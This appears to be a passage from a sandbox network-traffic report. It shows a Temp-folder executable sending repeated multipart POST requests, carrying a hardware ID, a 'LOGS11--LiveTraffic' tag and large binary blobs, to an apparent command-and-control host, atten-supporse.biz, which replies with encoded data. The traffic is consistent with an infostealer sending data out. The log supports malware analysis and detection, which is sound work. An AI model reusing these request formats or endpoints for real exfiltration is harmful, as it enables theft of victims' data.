                                                                                                                                                                                                                                            2024-12-09 20:09:49 UTC15331OUTData Raw: 2d 2d 36 4b 39 36 44 52 50 56 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 38 34 46 43 37 32 36 34 31 31 33 34 32 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 36 4b 39 36 44 52 50 56 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 4b 39 36 44 52 50 56 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 36 4b 39 36 44 52 50 56 32 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                                                                                                            Data Ascii: --6K96DRPV2Content-Disposition: form-data; name="hwid"3384FC726411342223D904AF30EFEBBC--6K96DRPV2Content-Disposition: form-data; name="pid"1--6K96DRPV2Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--6K96DRPV2Conten
                                                                                                                                                                                                                                            2024-12-09 20:09:49 UTC15331OUTData Raw: 79 8b 0a 59 79 7c ac bc 51 6a 8a 9e d4 95 c4 f2 c9 b8 ba e4 62 46 e5 67 e9 a2 11 3e a3 87 e1 87 7a b1 b1 e2 0f 8a b8 c5 78 30 8e 6a 9f e2 fd 32 54 a5 1b 24 70 ee 48 11 af 42 44 56 bc fe 0d 13 42 ff fe 68 d8 4f 62 56 88 ce 40 b5 4f ae 8b f5 15 0d 47 32 44 88 6a ba 53 06 00 63 7b a2 02 77 9a 44 c9 98 37 32 8c 89 b0 27 3c 4f b6 56 a5 f7 2d 99 c3 31 83 30 5b 48 70 4b 02 d3 87 86 e3 b9 b7 22 35 3e 5e 1f b7 8d 53 1f 57 7a f9 c5 81 f9 cc c1 9a 65 4f 97 8e db be e5 f7 78 0e 0e 4a 3b 71 e3 45 ad 1f f8 ae 55 68 6e 2c fd 71 97 db 91 00 65 a2 22 59 61 24 58 60 9a 92 af e9 da 40 ea c0 5e 64 64 f7 fb 49 ee 34 4a 9b df b0 e0 1e 1a 8b de ae 0f db 67 69 88 85 67 f1 25 94 e4 15 f6 95 62 48 52 e9 eb ab 96 17 cd d4 0a be 58 f7 f4 7b 72 7f 4c ce d7 fd 5a 7f 2a 3d 1c 11 9a 88
                                                                                                                                                                                                                                            Data Ascii: yYy|QjbFg>zx0j2T$pHBDVBhObV@OG2DjSc{wD72'<OV-10[HpK"5>^SWzeOxJ;qEUhn,qe"Ya$X`@^ddI4Jgig%bHRX{rLZ*=
                                                                                                                                                                                                                                            2024-12-09 20:09:49 UTC15331OUTData Raw: ee e7 3e 81 09 cc fa 35 f3 81 96 94 82 4a 76 f3 44 e7 a3 8f e1 15 a2 b7 e9 3f 7c 45 a3 5e 94 f2 de ff 88 24 74 75 b0 5f 38 10 3c 7a 3b 0d e7 0f 64 ae 2d bc 19 ae ee fd a0 4a 6a 38 b2 fb 0e bb b3 ac 76 3c b1 da ab a8 6a 7e 3d 64 d8 ab 6c 64 32 9c bb 92 59 55 b5 b0 f9 21 c4 6f f6 68 19 f9 cb df af 21 c6 bb 00 ee 27 27 ad 9f 66 01 ff fd c8 2c 5f e9 d0 57 87 eb 0a b8 8b e7 59 83 99 81 3b 43 5f c4 9c 37 0e 29 c8 49 2d 6d fe b8 bd 46 1f fd 57 4d d8 c4 f9 eb eb 8d 0c d1 b1 e5 fb 0e d5 f3 df c2 59 63 4f 05 6b 3a 7e af 99 fc 49 e1 5b 0d a7 a3 8a 59 a4 3d 37 92 f6 d0 bb fc 55 6e 5f 1f 16 b6 32 e6 94 38 54 dd 7d 37 54 72 f3 9f 21 f6 7a 55 3d 7f 0e 4b 39 6c 34 f2 ab 87 81 45 79 47 e4 83 fd de 41 41 b0 5f e3 e4 b3 1d 46 de 9f f6 61 60 6e d5 3e c6 99 fc 38 8f 7d 0c f2
                                                                                                                                                                                                                                            Data Ascii: >5JvD?|E^$tu_8<z;d-Jj8v<j~=dld2YU!oh!''f,_WY;C_7)I-mFWMYcOk:~I[Y=7Un_28T}7Tr!zU=K9l4EyGAA_Fa`n>8}
                                                                                                                                                                                                                                            2024-12-09 20:09:49 UTC15331OUTData Raw: ff b8 e6 8b 62 70 82 f9 71 a1 52 df 15 d2 a4 76 e8 4f 2c 76 3b c0 87 ff d2 e6 9f f4 55 af 6f 7c c9 8d 63 0a 58 17 22 59 15 73 af 1c 93 c5 c4 fb 22 36 49 ba 69 29 d5 95 32 9e 0d bd 01 45 cd d0 bf cc 89 3f 5b 60 a9 cf f2 29 8c 36 e3 67 13 0e 03 cc ba 3f a3 e9 9e 5b a7 0f 37 f2 ce 7f 45 45 5a 3f df 21 f9 62 06 00 cf 4e c5 19 cc 57 4e d6 3d ff cd 65 fd 37 91 d3 a7 7d 4b 29 59 1b dd b4 cb 7a e3 3d 2d a3 2f 24 7d cf 85 c1 9f 57 e3 d9 30 c4 2d 19 c5 79 ac ba 1d d3 81 77 71 c1 93 af 2e 98 19 ac c8 da 8e da 51 1d 1c 2d 71 36 2a 20 99 bb ec 69 ba 76 ef 0b f5 27 6b 20 cf 94 3e f7 a8 78 e7 ee fe af 43 f6 db 01 fa 3b 85 25 60 38 f1 33 92 44 53 a0 19 f1 03 5d 7e 28 9a 17 4c 94 67 6b a0 bb 79 98 b3 08 a0 84 a4 e0 af 49 1d 4f e6 af ca 94 00 9a 70 04 04 7a 84 ce 15 f3 40
                                                                                                                                                                                                                                            Data Ascii: bpqRvO,v;Uo|cX"Ys"6Ii)2E?[`)6g?[7EEZ?!bNWN=e7}K)Yz=-/$}W0-ywq.Q-q6* iv'k >xC;%`83DS]~(LgkyIOpz@
                                                                                                                                                                                                                                            2024-12-09 20:09:49 UTC15331OUTData Raw: be aa 8e c8 da 85 ea c0 b1 c1 21 26 67 f1 b8 26 44 3b c3 6b 37 cd 76 4b 0c ff ba 94 a4 8e e9 d3 10 07 2e 4f a5 4e 5f 05 53 ac 1d 9e fa 07 da ba 89 2d e6 57 a8 ea 17 6a 0c aa 8d 5a 19 2b 11 ad ff db ba 8e e0 ba 6b 99 71 2a 3c 42 a5 ea 74 26 06 64 95 23 de fc 3f a1 fa ff e4 6c 03 38 cd cc 96 22 02 e6 30 e0 1a 7a 6a c4 5e 12 6a 7a b9 dd f5 8b 13 b0 80 03 72 0c 09 d9 0d 3b 96 08 10 ba 9d af 0a 05 29 c1 e9 c2 2b 06 80 8c 08 13 05 07 ba ee 00 d3 ee fa 60 0c 5b 0d d5 72 ca df a8 70 a8 65 0e ff cf 24 aa 17 7d 74 a8 55 bc 00 19 f3 4a 82 fc c1 0c c2 c9 67 d4 85 18 7d 97 0b 7a 3d 9b ef 2e 8a 23 ca 90 d3 b4 d8 56 5c af a3 70 f2 a0 61 4a 75 ac d2 0d d1 29 94 80 05 91 8a d8 3c bc d4 4e 47 10 d9 17 7d ac 37 67 3f 6e 86 eb 72 77 d6 2a a8 b0 29 20 56 72 12 37 f7 fa 21 9b
                                                                                                                                                                                                                                            Data Ascii: !&g&D;k7vK.ON_S-WjZ+kq*<Bt&d#?l8"0zj^jzr;)+`[rpe$}tUJg}z=.#V\paJu)<NG}7g?nrw*) Vr7!
                                                                                                                                                                                                                                            2024-12-09 20:09:49 UTC15331OUTData Raw: 64 59 29 d3 03 40 85 97 34 b2 e0 37 ad 9a 80 ba a2 d9 48 85 18 6c ee 32 77 0d 0e 3e a1 65 09 69 5a 92 20 28 7f 2e f7 bf 75 76 fd 76 cd bc c2 65 70 c7 ef 19 9f ef c8 38 cc 1f e9 7f 67 26 0a 00 c0 11 06 1a 89 50 28 60 ae 4f 4d 3d 18 49 3b 0f e7 87 d7 61 4f 28 37 3a 6f f7 40 5c f5 fe c3 06 60 0d 9b a7 c0 ab 3f 46 6e 0e 51 04 c0 ab a5 36 24 5d 81 45 4f 09 fd 55 7a c0 00 3b 15 a0 81 84 78 11 87 10 26 54 fa 3d 26 f7 34 21 26 b2 da f7 4b ab c0 0b 7d 6f c9 9b 2d 23 7f df b0 63 55 75 1c 72 14 16 ae 7f ae 77 ab f4 fa 1b 88 3c be 71 79 8f 0c d0 be 39 34 f1 0f 66 e3 2b c4 28 ab 3e 86 63 08 8e e9 60 84 a0 85 46 a1 5e c9 9f b2 f4 c6 3d 97 ce e4 62 7d 0b 0b 6a 08 fc 73 70 7c 62 99 8e 68 78 7d 1b 6c 97 8d ca 43 64 f5 c5 83 d8 ce bf 92 93 bf 82 ec 40 f0 c6 94 54 34 f0 8a
                                                                                                                                                                                                                                            Data Ascii: dY)@47Hl2w>eiZ (.uvvep8g&P(`OM=I;aO(7:o@\`?FnQ6$]EOUz;x&T=&4!&K}o-#cUurw<qy94f+(>c`F^=b}jsp|bhx}lCd@T4
                                                                                                                                                                                                                                            2024-12-09 20:09:49 UTC15331OUTData Raw: d4 08 ba c1 dd a0 c8 07 71 ed 07 e6 94 19 a1 ee 44 81 41 7c 6a dd 71 9f b5 7d 2d 66 2a 92 9b 80 5a 91 fb 52 b6 9b 0d 07 41 9d 5a 4c a9 7e 01 ef 49 ae df 9e 62 6c 48 eb fc 17 ba 20 23 a9 98 8b 45 29 da f1 20 0e 4a d6 d7 3e 84 c8 ec 02 b6 4b ea 96 07 c4 30 30 fe 6c b8 bd 29 a1 d2 ea b9 38 fc 59 20 8d f5 db 95 f5 fb 9f ba 9a 67 11 dc cd 9c ed 49 8e d2 1b d7 1a 45 8e 59 30 4b 61 e1 c8 c6 1e 6b b6 79 fc 62 38 ab 2d 71 47 3d 86 a2 3e c4 a0 32 08 e3 8d 7f bf 7d f1 eb 85 0d dd ee 15 ac fb cc 6b dc 65 64 ff 29 75 a3 d5 19 fa 32 eb 9f dd 52 03 54 55 86 0e 76 aa 87 07 d4 2c 7f ff e9 79 f3 52 88 a5 15 a1 28 6e b3 02 13 35 ff 46 f5 f4 fd 13 77 e6 9d fa 3c fd 72 7b 9e b6 08 04 d0 7d 6f 2a 05 e2 b5 c5 65 d7 94 f6 a2 f0 d1 ab 85 8f 2a 50 d9 57 82 18 a3 c7 d4 c2 7a bf 0b
                                                                                                                                                                                                                                            Data Ascii: qDA|jq}-f*ZRAZL~IblH #E) J>K00l)8Y gIEY0Kakyb8-qG=>2}ked)u2RTUv,yR(n5Fw<r{}o*e*PWz
                                                                                                                                                                                                                                            2024-12-09 20:09:49 UTC15331OUTData Raw: bc 39 44 f6 5c bd fb e8 dc 10 7f 86 54 e5 a3 0c 7f d3 f8 5c 9d b6 32 77 68 72 4e 87 b9 7b f8 db ea 51 7e ce 90 c9 cc b1 fa 9b ec 6a 52 b0 e0 bb ed 20 5d 42 1d 3a d6 04 c0 51 1d 30 dd b9 b3 22 0e 22 39 c7 bc f6 60 f5 bc 99 04 68 19 51 a1 d5 dc bf 4f 7b 20 6a 1a fe 9d bb 4f 25 b5 40 c2 75 eb 8b 47 ae 35 c8 78 99 de df 22 d1 22 56 df cc 14 17 a7 88 ac 1c cf 2e ec ab 6c 78 5e 58 fc d3 1a c1 94 46 65 7c 6e 60 fd 27 04 0f 47 c3 27 44 81 1d fb 03 24 78 52 51 a5 07 90 a0 53 0a 34 9b f6 da 6d 4e 92 8c 84 a8 e4 16 0b c0 7c 75 7f 30 e8 6b 5d 25 4c 91 4e 08 40 c0 89 9c 17 4f 6a 7c b8 57 31 7c 1f 69 a7 31 64 d0 ed 8d b3 20 5d 13 77 19 03 09 03 19 9e 06 d0 d2 5f 7f 88 65 b8 39 1e 80 87 f5 87 98 5e 12 8f 2b cb 24 81 10 d3 51 9a ce 44 37 e9 23 98 0c de 1a e6 ec 25 f6 e5
                                                                                                                                                                                                                                            Data Ascii: 9D\T\2whrN{Q~jR ]B:Q0""9`hQO{ jO%@uG5x""V.lx^XFe|n`'G'D$xRQS4mN|u0k]%LN@Oj|W1|i1d ]w_e9^+$QD7#%
                                                                                                                                                                                                                                            2024-12-09 20:09:49 UTC15331OUTData Raw: 43 b6 34 4a 12 5c df ec 51 5e c2 bd 62 45 7b 25 63 68 ea 08 c8 53 88 0b ed 72 d9 78 3f f7 32 c8 68 57 aa 0d 3a ec 65 93 ee 18 77 30 23 d5 3e 33 72 bf 6c b3 ad de 93 ea a7 98 7e 25 15 38 00 3a f8 d7 3f ba 51 c4 6c d5 61 e6 59 c4 df 57 30 c9 f3 8c 74 76 2e 0b ef ed 03 fd 5a 2d 4c 42 d6 a1 b1 d9 b9 c0 c1 39 aa 0b d1 fc 80 3e 29 54 2f e1 d0 86 a0 28 2f 98 e6 10 53 12 15 5e 7f 21 cc 8d 8a 52 8c f9 d2 ab 6f ff 92 bf 46 69 b8 0d 61 85 85 62 4e 38 0c 55 bd 7c 82 6f e1 d5 29 53 dc 8a 8c e4 3b ce 87 f5 ca 50 55 99 59 07 c3 8c f8 ad 2d e0 19 63 47 cf db 89 f1 e1 f0 ea 93 3f 74 a3 48 1d 2c 54 2c e3 c5 12 17 0b 8a 65 4a 85 d7 cf 5a 50 55 d1 d7 10 94 e6 15 81 67 92 5c d5 20 a1 b8 75 6f 57 26 e8 05 01 02 dc 77 da 82 72 3f b6 9d d5 b4 8b 44 7a 04 eb e3 9a 57 b5 99 aa 6a
                                                                                                                                                                                                                                            Data Ascii: C4J\Q^bE{%chSrx?2hW:ew0#>3rl~%8:?QlaYW0tv.Z-LB9>)T/(/S^!RoFiabN8U|o)S;PUY-cG?tH,T,eJZPUg\ uoW&wr?DzWj
                                                                                                                                                                                                                                            2024-12-09 20:09:49 UTC15331OUTData Raw: 0d 0a d6 60 62 4a 31 09 36 36 a4 59 67 0c f5 fa 6c 16 a0 d4 0a 92 36 61 48 98 a3 05 ea 43 67 86 ab 9b 21 2a 0e 91 8c e1 b9 be 9b 9f 6a f9 ba 30 ef 3b c8 1f ea 5d 1c f0 f3 0c 9f eb 5d ad da 7b 5a 2b 68 f6 33 d9 6f 16 43 1f 32 e7 c4 64 9d 6a a4 d3 fd 5e f9 b3 b9 77 fd d9 3c 83 b1 59 5d 0a 4b 9d f8 9f da c0 5e e2 17 f4 38 db 07 e2 d3 c4 28 e3 10 ab db 86 3c 65 3e ff a1 b0 f4 77 b0 fb b8 f8 c7 89 f5 37 28 e0 36 3c 38 c0 be 0e e4 49 d9 d5 91 33 8d b3 1b 8e f4 a1 fe 70 56 3b 0b 81 02 e1 fe cb 0b d7 36 22 dc 6f 03 bd 52 20 28 08 dc 87 3d 27 11 f0 c0 4e 17 78 e0 0f 98 3f 2c 70 0b 8f ab ae d6 3a 16 ce 49 80 c8 72 19 b0 42 e0 f7 ed 9c 15 04 fd a8 d5 98 a5 94 f9 b9 07 9e 8f fd ec cd 96 ef 39 57 de 28 2e 6f b2 62 46 3a 27 7e b8 08 0c cf 10 68 4f 00 eb 7e 34 ec bc 0b
                                                                                                                                                                                                                                            Data Ascii: `bJ166Ygl6aHCg!*j0;]]{Z+h3oC2dj^w<Y]K^8(<e>w7(6<8I3pV;6"oR (='Nx?,p:IrB9W(.obF:'~hO~4
                                                                                                                                                                                                                                            2024-12-09 20:09:53 UTC1024INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:53 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=8lnmssmh1cvuup2msqk9bm2sin; expires=Fri, 04-Apr-2025 13:56:30 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=idpw72kcYFww0ixNuCaXQlE4kfP48dNGWUdsD5JADdrHE%2FGrJsJys9oOND1YZhZTRXXkVHkYBi0hQiivZ9VrE%2BqBNdQSt5DlaCJg0UwQKW%2FPV%2FDJpGMQ55pLF0IXhMNsTkK8aoI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ef7a295ffd843b0-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1591&rtt_var=600&sent=288&recv=587&lost=0&retrans=0&sent_bytes=2846&recv_bytes=568061&delivery_rate=1819314&cwnd=32&unsent_bytes=0&cid=424418d160d86890&ts=3597&x=0"


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            17192.168.2.649979104.21.48.14433504C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-09 20:09:51 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=BXV8NKNU
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 12805
                                                                                                                                                                                                                                            Host: atten-supporse.biz
                                                                                                                                                                                                                                            2024-12-09 20:09:51 UTC12805OUTData Raw: 2d 2d 42 58 56 38 4e 4b 4e 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 38 34 46 43 37 32 36 34 31 31 33 34 32 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 42 58 56 38 4e 4b 4e 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 42 58 56 38 4e 4b 4e 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 42 58 56 38 4e 4b 4e 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                                                                                                                                                            Data Ascii: --BXV8NKNUContent-Disposition: form-data; name="hwid"3384FC726411342223D904AF30EFEBBC--BXV8NKNUContent-Disposition: form-data; name="pid"2--BXV8NKNUContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--BXV8NKNUContent-Di
                                                                                                                                                                                                                                            2024-12-09 20:09:52 UTC1014INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:52 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=v9qotfotdiackkl820tv0dda5j; expires=Fri, 04-Apr-2025 13:56:31 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ADXROTwFjWXViLuZCoXYiuTkNdn8gpK5YoYUsdDTZiJODbUc9jEky7BZoIw2yqW3SU9W5xscpsUBxsVmmkrCQjLnOi6eJ%2FTXVnqHcyer0ZU6Q0odi59WCx0B0PWkMFwnNCLVWFM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ef7a2a49e700cc8-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1499&min_rtt=1492&rtt_var=575&sent=8&recv=16&lost=0&retrans=0&sent_bytes=2846&recv_bytes=13737&delivery_rate=1877813&cwnd=225&unsent_bytes=0&cid=a9f28639c993afc0&ts=968&x=0"
                                                                                                                                                                                                                                            2024-12-09 20:09:52 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                                                            2024-12-09 20:09:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            18192.168.2.649992104.21.48.14435440C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-09 20:09:54 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 88
                                                                                                                                                                                                                                            Host: atten-supporse.biz
                                                                                                                                                                                                                                            2024-12-09 20:09:54 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 33 33 38 34 46 43 37 32 36 34 31 31 33 34 32 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43
                                                                                                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=3384FC726411342223D904AF30EFEBBC
                                                                                                                                                                                                                                            2024-12-09 20:09:55 UTC1017INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:55 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=jmghrkrlbrnfoat40l0d6s5p2k; expires=Fri, 04-Apr-2025 13:56:34 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qJ7dgrxarziA7e57c%2FOoCwnWPv0nUsyO7u%2FwaxM5vvpackRNprBw7E0soVB1sW0mdIRMnxeHrd%2BUEOKyAr6hy3SwEucnMs3EUr89EE9T7wOXZkrBLVqS6Go9VvVPC%2BLDhoKoMsY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ef7a2b70e7c7ced-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1824&min_rtt=1819&rtt_var=692&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=990&delivery_rate=1569892&cwnd=179&unsent_bytes=0&cid=44bd2749e6003164&ts=765&x=0"
                                                                                                                                                                                                                                            2024-12-09 20:09:55 UTC214INData Raw: 64 30 0d 0a 73 63 68 50 31 66 4d 35 72 37 47 56 6e 33 44 4a 49 66 37 48 6a 71 7a 72 66 56 61 72 39 51 6e 54 62 35 6b 46 42 75 41 31 35 61 72 71 73 32 32 67 30 51 4f 4e 32 65 48 72 41 50 4e 39 30 5a 75 68 6e 64 4e 49 65 4a 6e 45 50 50 31 65 71 44 59 6f 30 51 4f 35 68 64 36 75 4b 59 6e 63 58 63 72 58 75 2f 6f 49 72 41 50 53 35 65 6a 59 79 55 64 6d 68 39 64 73 38 56 57 6f 65 43 71 62 46 35 43 49 69 2b 6f 6e 6f 59 64 4a 6c 65 32 36 77 31 2f 34 47 63 76 70 76 4a 33 65 55 32 65 61 78 69 66 69 57 63 55 71 64 5a 52 51 68 4d 66 74 35 7a 32 30 6e 56 33 41 33 4c 76 36 43 4b 77 44 30 75 58 6f 32 4d 6c 48 5a 6f 66 58 62 50 46 56 71 58 68 62 0d 0a
                                                                                                                                                                                                                                            Data Ascii: d0schP1fM5r7GVn3DJIf7HjqzrfVar9QnTb5kFBuA15arqs22g0QON2eHrAPN90ZuhndNIeJnEPP1eqDYo0QO5hd6uKYncXcrXu/oIrAPS5ejYyUdmh9ds8VWoeCqbF5CIi+onoYdJle26w1/4GcvpvJ3eU2eaxifiWcUqdZRQhMft5z20nV3A3Lv6CKwD0uXo2MlHZofXbPFVqXhb
                                                                                                                                                                                                                                            2024-12-09 20:09:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            19192.168.2.649994104.21.48.14433504C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-09 20:09:55 UTC285OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=G1VFG753CN6CM9ML1YE
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 15117
                                                                                                                                                                                                                                            Host: atten-supporse.biz
                                                                                                                                                                                                                                            2024-12-09 20:09:55 UTC15117OUTData Raw: 2d 2d 47 31 56 46 47 37 35 33 43 4e 36 43 4d 39 4d 4c 31 59 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 38 34 46 43 37 32 36 34 31 31 33 34 32 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 47 31 56 46 47 37 35 33 43 4e 36 43 4d 39 4d 4c 31 59 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 31 56 46 47 37 35 33 43 4e 36 43 4d 39 4d 4c 31 59 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69
                                                                                                                                                                                                                                            Data Ascii: --G1VFG753CN6CM9ML1YEContent-Disposition: form-data; name="hwid"3384FC726411342223D904AF30EFEBBC--G1VFG753CN6CM9ML1YEContent-Disposition: form-data; name="pid"2--G1VFG753CN6CM9ML1YEContent-Disposition: form-data; name="lid"LOGS11--Li
                                                                                                                                                                                                                                            2024-12-09 20:09:56 UTC1020INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:56 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
